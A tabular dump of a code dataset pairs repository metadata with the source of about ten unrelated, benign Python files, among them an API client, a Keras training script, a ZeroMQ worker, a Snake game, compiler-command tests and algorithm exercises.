hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b156849efe28743e1f59dbcfbfb3f32c4319b8b3
| 2,718
|
py
|
Python
|
gecko/classes/api_handler.py
|
paulschick/Coingecko-Crypto-Price-API
|
c712856bf423a6d1d429a35c8a8e01bb983ec7ff
|
[
"MIT"
] | 2
|
2022-01-18T18:09:31.000Z
|
2022-02-28T01:01:45.000Z
|
gecko/classes/api_handler.py
|
paulschick/Coingecko-Crypto-Price-API
|
c712856bf423a6d1d429a35c8a8e01bb983ec7ff
|
[
"MIT"
] | null | null | null |
gecko/classes/api_handler.py
|
paulschick/Coingecko-Crypto-Price-API
|
c712856bf423a6d1d429a35c8a8e01bb983ec7ff
|
[
"MIT"
] | null | null | null |
import aiohttp
from aiohttp import ClientConnectionError, ClientResponseError
from .models import CoinsResponse, SimplePriceResponse
from .configs import Config
from typing import List, Dict, Union
class APIHandler:
def __init__(self):
self._config: Config = Config()
async def get_supported_coins(self) -> List[CoinsResponse]:
uri: str = self._config.coins_list_uri
async with aiohttp.ClientSession() as session:
async with session.get(uri) as resp:
try:
res: List[Dict[str, str]] = await resp.json()
res_instances: List[CoinsResponse] = list()
for coin in res:
instance: CoinsResponse = CoinsResponse(
id=coin.get('id', ''),
symbol=coin.get('symbol', ''),
name=coin.get('name', '')
)
res_instances.append(instance)
return res_instances
except (
ClientConnectionError, ClientResponseError,
Exception
) as e:
print(f'Exception from API: {type(e).__name__}')
raise e
async def get_simple_price(self, currencies: List[str]) -> Union[List[SimplePriceResponse], None]:
uri: str = self._config.simple_price_uri(currencies)
async with aiohttp.ClientSession() as session:
async with session.get(uri) as resp:
try:
res: Union[Dict, None] = await resp.json()
if res.get('error', None) is not None:
msg = res['error']
raise Exception(msg)
except (
ClientConnectionError, ClientResponseError,
Exception
) as e:
print(f'Exception from API: {type(e).__name__}')
raise e
if type(res) is dict:
responses: List[SimplePriceResponse] = list()
for k, v in res.items():
_id = k
currency_key_list = list(v.keys())
curr = currency_key_list[0]
value = v[curr]
price_response = SimplePriceResponse(
id=_id,
quote=curr,
price=value
)
responses.append(price_response)
return responses
else:
return None
| 41.181818
| 102
| 0.472774
| 2,517
| 0.926049
| 0
| 0
| 0
| 0
| 2,424
| 0.891832
| 120
| 0.04415
|
b156a941a513ed31187d8dbd1191f683290ef317
| 1,497
|
py
|
Python
|
Hello-Cifar-10/keras.py
|
PyTorchLightning/grid-tutorials
|
a45ec1bed374660b5a423d096945e462b3241efc
|
[
"Apache-2.0"
] | null | null | null |
Hello-Cifar-10/keras.py
|
PyTorchLightning/grid-tutorials
|
a45ec1bed374660b5a423d096945e462b3241efc
|
[
"Apache-2.0"
] | null | null | null |
Hello-Cifar-10/keras.py
|
PyTorchLightning/grid-tutorials
|
a45ec1bed374660b5a423d096945e462b3241efc
|
[
"Apache-2.0"
] | null | null | null |
from argparse import ArgumentParser
from pathlib import Path
from tensorflow import keras
# Define this script's flags
parser = ArgumentParser()
parser.add_argument('--lr', type=float, default=1e-3)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--max_epochs', type=int, default=5)
parser.add_argument('--data_dir', type=str, default="./data/")
args = parser.parse_args()
# Make sure data_dir is absolute + create it if it doesn't exist
data_dir = Path(args.data_dir).absolute()
data_dir.mkdir(parents=True, exist_ok=True)
# Download and/or load data from disk
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data(data_dir / 'mnist.npz')
# Standardize X's to be between 0.0-1.0 instead of 0-255
x_train, x_test = x_train.astype("float32") / 255, x_test.astype("float32") / 255
# Build Model
model = keras.models.Sequential(
[
keras.layers.Flatten(input_shape=(28, 28, 1)),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax'),
]
)
# Compile
model.compile(
optimizer=keras.optimizers.Adam(learning_rate=args.lr),
loss="sparse_categorical_crossentropy",
metrics=["sparse_categorical_accuracy"],
)
# Train
history = model.fit(
x_train,
y_train,
batch_size=args.batch_size,
epochs=args.max_epochs,
validation_split=0.1,
callbacks=[keras.callbacks.TensorBoard(log_dir='./lightning_logs/keras')],
)
# Evaluate
model.evaluate(x_test, y_test)
| 28.788462
| 93
| 0.725451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 409
| 0.273213
|
b15750ce5aef5b54cce96688ad262cadc96dc7f8
| 4,432
|
py
|
Python
|
src/taskmaster/client.py
|
alex/taskmaster
|
04a03bf0853facf318ce98192db6389cdaaefe3c
|
[
"Apache-2.0"
] | 2
|
2015-11-08T12:45:38.000Z
|
2017-06-03T09:16:16.000Z
|
src/taskmaster/client.py
|
alex/taskmaster
|
04a03bf0853facf318ce98192db6389cdaaefe3c
|
[
"Apache-2.0"
] | null | null | null |
src/taskmaster/client.py
|
alex/taskmaster
|
04a03bf0853facf318ce98192db6389cdaaefe3c
|
[
"Apache-2.0"
] | null | null | null |
"""
taskmaster.consumer
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import cPickle as pickle
import gevent
from gevent_zeromq import zmq
from gevent.queue import Queue
from taskmaster.util import import_target
class Worker(object):
def __init__(self, consumer, target):
self.consumer = consumer
self.target = target
def run(self):
self.started = True
while self.started:
gevent.sleep(0)
try:
job_id, job = self.consumer.get_job()
self.target(job)
except KeyboardInterrupt:
return
finally:
self.consumer.task_done()
class Client(object):
def __init__(self, address, timeout=2500, retries=3):
self.address = address
self.timeout = timeout
self.retries = retries
self.context = zmq.Context(1)
self.poller = zmq.Poller()
self.client = None
def reconnect(self):
if self.client:
self.poller.unregister(self.client)
self.client.close()
print "Reconnecting to server on %r" % self.address
else:
print "Connecting to server on %r" % self.address
self.client = self.context.socket(zmq.REQ)
self.client.setsockopt(zmq.LINGER, 0)
self.client.connect(self.address)
self.poller.register(self.client, zmq.POLLIN)
def send(self, cmd, data=''):
request = [cmd, data]
retries = self.retries
reply = None
while retries > 0:
gevent.sleep(0)
self.client.send_multipart(request)
try:
items = self.poller.poll(self.timeout)
except KeyboardInterrupt:
break # interrupted
if items:
reply = self.recv()
break
else:
if retries:
self.reconnect()
else:
break
retries -= 1
return reply
def recv(self):
reply = self.client.recv_multipart()
assert len(reply) == 2
return reply
def destroy(self):
if self.client:
self.poller.unregister(self.client)
self.client.setsockopt(zmq.LINGER, 0)
self.client.close()
self.context.destroy()
class Consumer(object):
def __init__(self, client, target, progressbar=True):
if isinstance(target, basestring):
target = import_target(target, 'handle_job')
self.client = client
self.target = target
self.queue = Queue(maxsize=1)
if progressbar:
self.pbar = self.get_progressbar()
else:
self.pbar = None
self._wants_job = False
def get_progressbar(self):
from taskmaster.progressbar import Counter, Speed, Timer, ProgressBar, UnknownLength
widgets = ['Tasks Completed: ', Counter(), ' | ', Speed(), ' | ', Timer()]
pbar = ProgressBar(widgets=widgets, maxval=UnknownLength)
return pbar
def get_job(self):
self._wants_job = True
return self.queue.get()
def task_done(self):
if self.pbar:
self.pbar.update(self.tasks_completed)
self.tasks_completed += 1
# self.client.send('DONE')
def start(self):
self.started = True
self.tasks_completed = 0
self.client.reconnect()
worker = Worker(self, self.target)
gevent.spawn(worker.run)
if self.pbar:
self.pbar.start()
while self.started:
gevent.sleep(0)
# If the queue has items in it, we just loop
if not self._wants_job:
continue
reply = self.client.send('GET')
if not reply:
break
cmd, data = reply
# Reply can be "WAIT", "OK", or "ERROR"
if cmd == 'OK':
self._wants_job = False
job = pickle.loads(data)
self.queue.put(job)
elif cmd == 'QUIT':
break
self.shutdown()
def shutdown(self):
if not self.started:
return
self.started = False
if self.pbar:
self.pbar.finish()
self.client.destroy()
| 25.181818
| 92
| 0.54287
| 4,142
| 0.934567
| 0
| 0
| 0
| 0
| 0
| 0
| 375
| 0.084612
|
b1587cfb5054c54695ad8b82700668819e284945
| 3,165
|
py
|
Python
|
src/loop.py
|
migueldingli1997/PySnake
|
b9b7e98651b207f7bf846cd951b4bb4ee3bba426
|
[
"Apache-2.0"
] | 2
|
2020-03-06T09:09:00.000Z
|
2022-01-12T14:29:51.000Z
|
src/loop.py
|
migueldingli1997/PySnake
|
b9b7e98651b207f7bf846cd951b4bb4ee3bba426
|
[
"Apache-2.0"
] | 20
|
2020-02-09T16:42:53.000Z
|
2020-03-07T18:47:35.000Z
|
src/loop.py
|
migueldingli1997/PySnake
|
b9b7e98651b207f7bf846cd951b4bb4ee3bba426
|
[
"Apache-2.0"
] | null | null | null |
import pygame as pg
from pygame.time import Clock
from src.drawer import Drawer
from src.game import Game
from src.utils.config import Config
from src.utils.score import ScoresList
from src.utils.sfx import SfxHolder
from src.utils.text import Text
from src.utils.util import Util, user_quit
class Loop:
def __init__(self, util: Util, cfg: Config, sfx: SfxHolder, txt: Text,
drawer: Drawer):
self.util = util
self.cfg = cfg
self.sfx = sfx
self.txt = txt
self.drawer = drawer
self.clock = Clock()
def main(self, screen, game: Game) -> bool:
# Dump first tick to ignore past
self.clock.tick(self.cfg.frames_per_second)
while True:
# Get change in time
dt = self.clock.tick(self.cfg.frames_per_second)
# Loop over events (quit, key down, key up)
for event in pg.event.get():
if user_quit(event):
return False
elif event.type == pg.KEYDOWN:
if event.key in self.cfg.all_keys:
game.press_key(event.key)
elif event.type == pg.KEYUP:
if event.key in self.cfg.all_keys:
game.release_key(event.key)
# Move and draw game (with possible paused screen and fps)
if not game.paused:
game.move(dt)
if not game.game_over:
self.drawer.draw_game(screen, game, dt)
if game.paused:
self.drawer.draw_paused_overlay(screen)
if self.cfg.draw_fps:
self.drawer.draw_fps(screen, self.clock.get_fps())
# Update display
pg.display.update()
# Break if game no longer running
if game.game_over:
return True
def game_over(self, screen, game: Game, scores: ScoresList) -> bool:
score_saved = False # not saved yet
self.sfx.game_over.play() # play audio
i = 0
while True:
# Fade-in game over screen
if i < 256:
pg.event.get() # dummy get
self.drawer.draw_game(screen, game, 0) # draw game
self.drawer.draw_game_over_overlay(
screen, i, score_saved) # fade-in game over screen
self.clock.tick(60) # slow-down the fade-in
# Refresh screen
pg.display.flip()
i += 1
# Check for quit or restart events
for event in pg.event.get():
if user_quit(event):
return False
elif event.type == pg.MOUSEBUTTONDOWN:
if self.txt.restart_rect.collidepoint(*event.pos):
return True
elif not score_saved and \
self.txt.save_score_rect.collidepoint(*event.pos):
for score in game.get_scores():
scores.add_score(score)
scores.write()
score_saved = True
| 35.166667
| 78
| 0.529226
| 2,869
| 0.906477
| 0
| 0
| 0
| 0
| 0
| 0
| 376
| 0.118799
|
b15a0f38860998844631ced61f5490b9a9898c55
| 7,135
|
py
|
Python
|
tests/test_detectCompileCommand.py
|
langrind/ccjtools
|
6f92d8cadf24d6e1f26e984df3c11b4d58061053
|
[
"MIT"
] | null | null | null |
tests/test_detectCompileCommand.py
|
langrind/ccjtools
|
6f92d8cadf24d6e1f26e984df3c11b4d58061053
|
[
"MIT"
] | null | null | null |
tests/test_detectCompileCommand.py
|
langrind/ccjtools
|
6f92d8cadf24d6e1f26e984df3c11b4d58061053
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from ccjtools import ccj_make
def test_detectExactSpecifiedCompilerCommandWord():
"""Using -c option, check that the exact word is recognized"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName, '-c', 'mastadon'])
if not parsedArgs:
assert False
# Note that we are basically testing "strcmp()" here. A different test is used
# to check a whole line of input
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "Mastadon"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "Mastadon"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon++"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "astadon"):
assert False
assert True
def test_detectCompilerWord():
"""Not using -c option, check that plausible compiler commands are recognized"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName])
if not parsedArgs:
assert False
# Note that we are basically testing a regexp single-word match. A different test
# is used to check a whole line of input
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "gcc"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon-gcc"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "Mastadon-c++"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "gcc"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "c++"):
assert False
if not ccj_make.mkccj_is_compiler_command(parsedArgs, "g++"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon++"):
assert False
if ccj_make.mkccj_is_compiler_command(parsedArgs, "mastadon"):
assert False
assert True
def test_detectExactSpecifiedCompilerCommand():
"""Using -c option, check that lines are recognized correctly"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName, '-c', 'mastadon'])
if not parsedArgs:
assert False
if ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadons are not bluefish -Itheentireseas"):
assert False
if not ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadon are not bluefish -Itheentireseas"):
assert False
if ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadon-gcc mastadon.c -D_THIS_ -D_THAT_ -fno-dependent-clauses-or-santa-clauses-either"):
assert False
bigString = "/opt/gcc-arm-none-eabi-6-2017-q2-update/bin/arm-none-eabi-g++ -DCONFIG_ARCH_BOARD_PX4_FMU_V5 -D__CUSTOM_FILE_IO__ -D__DF_NUTTX -D__PX4_NUTTX -D__STDC_FORMAT_MACROS -isystem ../../platforms/nuttx/NuttX/include/cxx -isystem NuttX/nuttx/include/cxx -isystem NuttX/nuttx/include -I../../boards/px4/fmu-v5/src -I../../platforms/nuttx/src/px4/common/include -I. -Isrc -Isrc/lib -Isrc/modules -I../../platforms/nuttx/src/px4/stm/stm32f7/include -I../../platforms/common/include -I../../src -I../../src/include -I../../src/lib -I../../src/lib/DriverFramework/framework/include -I../../src/lib/matrix -I../../src/modules -I../../src/platforms -INuttX/nuttx/arch/arm/src/armv7-m -INuttX/nuttx/arch/arm/src/chip -INuttX/nuttx/arch/arm/src/common -INuttX/apps/include -mcpu=cortex-m7 -mthumb -mfpu=fpv5-d16 -mfloat-abi=hard -Os -DNDEBUG -g -fdata-sections -ffunction-sections -fomit-frame-pointer -fmerge-all-constants -fno-signed-zeros -fno-trapping-math -freciprocal-math -fno-math-errno -fno-strict-aliasing -fvisibility=hidden -include visibility.h -Wall -Wextra -Werror -Warray-bounds -Wcast-align -Wdisabled-optimization -Wdouble-promotion -Wfatal-errors -Wfloat-equal -Wformat-security -Winit-self -Wlogical-op -Wpointer-arith -Wshadow -Wuninitialized -Wunknown-pragmas -Wunused-variable -Wno-missing-field-initializers -Wno-missing-include-dirs -Wno-unused-parameter -fdiagnostics-color=always -fno-builtin-printf -fno-strength-reduce -Wformat=1 -Wunused-but-set-variable -Wno-format-truncation -fcheck-new -fno-exceptions -fno-rtti -fno-threadsafe-statics -Wreorder -Wno-overloaded-virtual -nostdinc++ -std=gnu++11 -o msg/CMakeFiles/uorb_msgs.dir/topics_sources/uORBTopics.cpp.obj -c /home/langrind/Firmware/build/px4_fmu-v5_multicopter/msg/topics_sources/uORBTopics.cpp"
if ccj_make.mkccj_process_line(parsedArgs, {}, [], bigString):
assert False
assert True
def test_detectCompilerCommandLine():
"""Not using -c option, check that plausible compiler command lines are recognized"""
inputFileName = 'dummy'
parsedArgs = ccj_make.mkccj_parse_args(['progname', inputFileName])
if not parsedArgs:
assert False
if ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadons are not bluefish -Itheentireseas"):
assert False
if not ccj_make.mkccj_process_line(parsedArgs, {}, [], "mastadon-gcc mastadon.c -D_THIS_ -D_THAT_ -fno-dependent-clauses-or-santa-clauses-either"):
assert False
bigString = "/opt/gcc-arm-none-eabi-6-2017-q2-update/bin/arm-none-eabi-g++ -DCONFIG_ARCH_BOARD_PX4_FMU_V5 -D__CUSTOM_FILE_IO__ -D__DF_NUTTX -D__PX4_NUTTX -D__STDC_FORMAT_MACROS -isystem ../../platforms/nuttx/NuttX/include/cxx -isystem NuttX/nuttx/include/cxx -isystem NuttX/nuttx/include -I../../boards/px4/fmu-v5/src -I../../platforms/nuttx/src/px4/common/include -I. -Isrc -Isrc/lib -Isrc/modules -I../../platforms/nuttx/src/px4/stm/stm32f7/include -I../../platforms/common/include -I../../src -I../../src/include -I../../src/lib -I../../src/lib/DriverFramework/framework/include -I../../src/lib/matrix -I../../src/modules -I../../src/platforms -INuttX/nuttx/arch/arm/src/armv7-m -INuttX/nuttx/arch/arm/src/chip -INuttX/nuttx/arch/arm/src/common -INuttX/apps/include -mcpu=cortex-m7 -mthumb -mfpu=fpv5-d16 -mfloat-abi=hard -Os -DNDEBUG -g -fdata-sections -ffunction-sections -fomit-frame-pointer -fmerge-all-constants -fno-signed-zeros -fno-trapping-math -freciprocal-math -fno-math-errno -fno-strict-aliasing -fvisibility=hidden -include visibility.h -Wall -Wextra -Werror -Warray-bounds -Wcast-align -Wdisabled-optimization -Wdouble-promotion -Wfatal-errors -Wfloat-equal -Wformat-security -Winit-self -Wlogical-op -Wpointer-arith -Wshadow -Wuninitialized -Wunknown-pragmas -Wunused-variable -Wno-missing-field-initializers -Wno-missing-include-dirs -Wno-unused-parameter -fdiagnostics-color=always -fno-builtin-printf -fno-strength-reduce -Wformat=1 -Wunused-but-set-variable -Wno-format-truncation -fcheck-new -fno-exceptions -fno-rtti -fno-threadsafe-statics -Wreorder -Wno-overloaded-virtual -nostdinc++ -std=gnu++11 -o msg/CMakeFiles/uorb_msgs.dir/topics_sources/uORBTopics.cpp.obj -c /home/langrind/Firmware/build/px4_fmu-v5_multicopter/msg/topics_sources/uORBTopics.cpp"
if not ccj_make.mkccj_process_line(parsedArgs, {}, [], bigString):
assert False
assert True
| 62.043478
| 1,789
| 0.737211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,618
| 0.647232
|
b15a35bd4f1abd5ba27c131e3166d2cc71012e7c
| 748
|
py
|
Python
|
Medium/valid-ip-addresses.py
|
SaumyaRai2010/algoexpert-data-structures-algorithms
|
bcafd8d7798661bf86c2d6234221d764c68fc19f
|
[
"MIT"
] | 152
|
2021-07-15T02:56:17.000Z
|
2022-03-31T08:59:52.000Z
|
Medium/valid-ip-addresses.py
|
deepakgarg08/algoexpert-data-structures-algorithms
|
2264802bce971e842c616b1eaf9238639d73915f
|
[
"MIT"
] | 2
|
2021-07-18T22:01:28.000Z
|
2022-02-17T03:55:04.000Z
|
Medium/valid-ip-addresses.py
|
deepakgarg08/algoexpert-data-structures-algorithms
|
2264802bce971e842c616b1eaf9238639d73915f
|
[
"MIT"
] | 74
|
2021-07-16T11:55:30.000Z
|
2022-03-31T14:48:06.000Z
|
# VALID IP ADDRESSES
# O(1) time and space
def validIPAddresses(string):
# Write your code here.
validIPAddresses = []
if len(string) < 4:
return []
for i in range(3):
if not isValidPart(string[:i+1]):
continue
for j in range(i+1, i+4):
if not isValidPart(string[i+1:j+1]):
continue
for k in range(j+1, j+4):
if not isValidPart(string[j+1:k+1]) or not isValidPart(string[k+1:]):
continue
validIP = string[:i+1] + "." + string[i+1:j+1] + "." + string[j+1:k+1] + "." + string[k+1:]
validIPAddresses.append(validIP)
return validIPAddresses
def isValidPart(string):
if len(string) == 1:
return True
if not 0 < len(string) < 4 or string[0] == "0":
return False
return 0 <= int(string) <= 255
| 24.933333
| 95
| 0.620321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 76
| 0.101604
|
b15acd6c26c6ac380b78b3c4621e284328ee4d9a
| 1,999
|
py
|
Python
|
resnet152/configs.py
|
LiuHao-THU/frame2d
|
c2b923aa45bf2e523e281d1bc36c7f3e70f9fb2b
|
[
"Apache-2.0"
] | 1
|
2020-05-15T03:28:53.000Z
|
2020-05-15T03:28:53.000Z
|
resnet152/configs.py
|
LiuHao-THU/frame2d
|
c2b923aa45bf2e523e281d1bc36c7f3e70f9fb2b
|
[
"Apache-2.0"
] | null | null | null |
resnet152/configs.py
|
LiuHao-THU/frame2d
|
c2b923aa45bf2e523e281d1bc36c7f3e70f9fb2b
|
[
"Apache-2.0"
] | null | null | null |
"""
this .py file contains all the parameters
"""
import os
configs = {}
main_dir = 'frame_vessel/resnet152'
#****************************************read data parameters**************************************
configs['max_angle'] = 20
configs['root_dir'] = 'data'
configs['save_dir'] = 'saved_data'
configs['image_size'] = 224
configs['per'] = 0.9 #percentage splited from the raw data
configs['saved_npy'] = True
configs['imgs_train'] = 'imgs_train.npy'
configs['imgs_label'] = 'imgs_label.npy'
configs['imgs_train_test'] = 'imgs_train_test.npy'
configs['imgs_label_test'] = 'imgs_label_test.npy'
configs['model_path'] = 'frame_vessel/pretrain_model/resnet/resnet152.npy'
#**************************************argumentation parameters************************************
configs['raw_images'] = True
configs['horizontal_flip_num'] = False
configs['vertical_flip_num'] = False
configs['random_rotate_num'] = 1
configs['random_crop_num'] = 1
configs['center_crop_num'] = 0
configs['slide_crop_num'] = 0
configs['slide_crop_old_num'] = 0
#*************************************train parameters**********************************************
configs['image_size'] = 224
# configs['channel'] = 3
configs['channel'] = 3
configs["batch_size"] = 8
configs['epoch'] = 20
configs['final_layer_type'] = "softmax_sparse"
configs['learning_rate_orig'] = 1e-3
configs['checkpoint_dir'] = main_dir+ '/check_points'
configs['num_classes'] = 3
configs['VGG_MEAN'] = [1.030626238009759419e+02, 1.159028825738600261e+02, 1.231516308384586438e+02]
configs['_BATCH_NORM_DECAY'] = 0.997
configs['_BATCH_NORM_EPSILON'] = 1e-5
#************************************device parameters**********************************************
configs["num_gpus"] = 1
configs["dev"] = '/gpu:0' #'/cpu:0'
# configs["dev"] = '/cpu:0' #'/cpu:0'
configs['GPU'] = '0'
#************************************evaluate parameters********************************************
| 39.98
| 101
| 0.561281
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,321
| 0.66083
|
b15c81d9f33f129ae3eb078cb489fe17c6a3fe71
| 2,707
|
py
|
Python
|
src/packagedcode/windows.py
|
Siddhant-K-code/scancode-toolkit
|
d1e725d3603a8f96c25f7e3f7595c68999b92a67
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 1,511
|
2015-07-01T15:29:03.000Z
|
2022-03-30T13:40:05.000Z
|
src/packagedcode/windows.py
|
Siddhant-K-code/scancode-toolkit
|
d1e725d3603a8f96c25f7e3f7595c68999b92a67
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2,695
|
2015-07-01T16:01:35.000Z
|
2022-03-31T19:17:44.000Z
|
src/packagedcode/windows.py
|
Siddhant-K-code/scancode-toolkit
|
d1e725d3603a8f96c25f7e3f7595c68999b92a67
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 540
|
2015-07-01T15:08:19.000Z
|
2022-03-31T12:13:11.000Z
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import attr
import xmltodict
from packagedcode import models
from commoncode import filetype
# Tracing flags
TRACE = False
def logger_debug(*args):
pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
# logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, str) and a or repr(a) for a in args))
@attr.s()
class MicrosoftUpdatePackage(models.Package, models.PackageManifest):
extensions = ('.mum',)
filetypes = ('xml 1.0 document',)
mimetypes = ('text/xml',)
default_type = 'windows-update'
@attr.s()
class MicrosoftUpdateManifest(MicrosoftUpdatePackage, models.PackageManifest):
@classmethod
def is_manifest(cls, location):
"""
Return True if the file at ``location`` is likely a manifest of this type.
"""
return filetype.is_file(location) and location.endswith('.mum')
@classmethod
def recognize(cls, location):
"""
Yield one or more Package manifest objects given a file ``location`` pointing to a
package archive, manifest or similar.
"""
with open(location , 'rb') as loc:
parsed = xmltodict.parse(loc)
if TRACE:
logger_debug('parsed:', parsed)
if not parsed:
return
assembly = parsed.get('assembly', {})
description = assembly.get('@description', '')
company = assembly.get('@company', '')
copyright = assembly.get('@copyright', '')
support_url = assembly.get('@supportInformation', '')
assembly_identity = assembly.get('assemblyIdentity', {})
name = assembly_identity.get('@name', '')
version = assembly_identity.get('@version', '')
parties = []
if company:
parties.append(
models.Party(
name=company,
type=models.party_org,
role='owner',
)
)
yield cls(
name=name,
version=version,
description=description,
homepage_url=support_url,
parties=parties,
copyright=copyright,
)
| 27.622449
| 90
| 0.615441
| 1,811
| 0.669006
| 1,276
| 0.471371
| 1,831
| 0.676395
| 0
| 0
| 868
| 0.32065
|
b15cd11eeded0e97332a28f0cc409f651b2843ff
| 988
|
py
|
Python
|
day-21/main.py
|
jmolinski/advent-of-code-2018
|
96bad97d6523bc99d63c86bbff6b13602952a91d
|
[
"MIT"
] | 2
|
2018-12-16T20:48:52.000Z
|
2021-03-28T15:07:51.000Z
|
day-21/main.py
|
jmolinski/advent-of-code-2018
|
96bad97d6523bc99d63c86bbff6b13602952a91d
|
[
"MIT"
] | null | null | null |
day-21/main.py
|
jmolinski/advent-of-code-2018
|
96bad97d6523bc99d63c86bbff6b13602952a91d
|
[
"MIT"
] | 1
|
2018-12-02T13:36:24.000Z
|
2018-12-02T13:36:24.000Z
|
# decompiled-by-hand & optimized
# definitely not gonna refactor this one
# 0.18s on pypy3
ip_reg = 4
reg = [0, 0, 0, 0, 0, 0]
i = 0
seen = set()
lst = []
while True:
i += 1
break_true = False
while True:
if break_true:
if i == 1:
print("1)", reg[1])
if reg[1] in seen:
if len(lst) == 25000:
p2 = max(seen, key=lambda x: lst.index(x))
print("2)", p2)
exit()
seen.add(reg[1])
lst.append(reg[1])
break
reg[2] = reg[1] | 65536 # 6
reg[1] = 8725355 # 7
while True:
reg[5] = reg[2] & 255 # 8
reg[1] += reg[5] # 9
reg[1] &= 16777215 # 10
reg[1] *= 65899 # 11
reg[1] &= 16777215 # 12
reg[2] = reg[2] // 256
if reg[2] == 0:
break_true = True
break
break_true = False
| 22.976744
| 62
| 0.403846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.121457
|
b15ea12d5029680389c91718e2950c1e519b15d4
| 1,247
|
py
|
Python
|
website/canvas/funnels.py
|
bopopescu/drawquest-web
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
[
"BSD-3-Clause"
] | 61
|
2015-11-10T17:13:46.000Z
|
2021-08-06T17:58:30.000Z
|
website/canvas/funnels.py
|
bopopescu/drawquest-web
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
[
"BSD-3-Clause"
] | 13
|
2015-11-11T07:49:41.000Z
|
2021-06-09T03:45:31.000Z
|
website/canvas/funnels.py
|
bopopescu/drawquest-web
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
[
"BSD-3-Clause"
] | 18
|
2015-11-11T04:50:04.000Z
|
2021-08-20T00:57:11.000Z
|
from django.conf import settings
from canvas.metrics import Metrics
class Funnel(object):
def __init__(self, name, steps):
self.name = name
self.steps = steps
def __repr__(self):
return self.name
def step_names(self):
return [step.name for step in self.steps]
class Funnels(object):
if settings.PROJECT == 'canvas':
names = (
('signup_to_activation', [
Metrics.signup,
Metrics.sticker,
Metrics.post,
]),
('onboarding', [
Metrics.signup_form_view,
Metrics.signup,
Metrics.onboarding_funnel_start,
Metrics.onboarding_groups,
Metrics.onboarding_invites,
Metrics.invite_facebook_friends,
Metrics.onboarding_welcome_tutorial_view,
Metrics.onboarding_finish,
]),
)
elif settings.PROJECT == 'drawquest':
names = ()
def _setup_funnels():
by_name = {}
for name, steps in Funnels.names:
funnel = Funnel(name, steps)
setattr(Funnels, name, funnel)
by_name[name] = funnel
Funnels.by_name = by_name
_setup_funnels()
